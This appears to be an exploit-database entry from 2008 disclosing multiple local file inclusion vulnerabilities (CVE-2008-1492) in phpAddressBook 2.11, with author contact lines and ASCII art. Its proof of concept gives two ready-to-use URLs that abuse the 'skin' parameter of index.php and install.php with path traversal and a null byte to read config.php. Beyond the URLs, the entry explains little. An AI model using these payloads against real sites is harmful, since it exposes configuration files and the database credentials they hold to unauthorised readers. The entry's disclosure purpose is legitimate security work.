phpAddressBook 2.11 - Multiple Local File Inclusions

Author: 0x90
type: webapps
platform: php
port: 
date_added: 2008-03-20 
date_updated:  
verified: 1 
codes: OSVDB-43667;CVE-2008-1492;OSVDB-43666 
tags: 
aliases:  
screenshot_url:  
application_url: 

      /  _  \ /\  /\ / _  \ /  _  \
      | | | | \ \/ / ||_| | | | | |
      | | | |  \  /  \_   | | | | |
      | |_| |  /  \   __\ | | |_| |
      \_____/ / /\ \ |____/ \_____/
              \/  \/


[~] phpAddressBook v2.11 Multiple Local File Inclusion Vulnerabilities

[~] Download: http://downloads.coronamatrix.org/phpAddressBookv2.11.zip

[~] Founder: 0x90

[~] HomePage: www.0x90.com.ar

[~] Public: http://0x90.com.ar/Advisory/20080321.txt

[~] Contact: Guns[at]0x90[dot]com[dot]ar

[~] PoC:

   http://[host]/[path]/index.php?skin=/../config.php %00
   http://[host]/[path]/install.php?skin=/../config.php %00


Greetz: ...

# milw0rm.com [2008-03-21]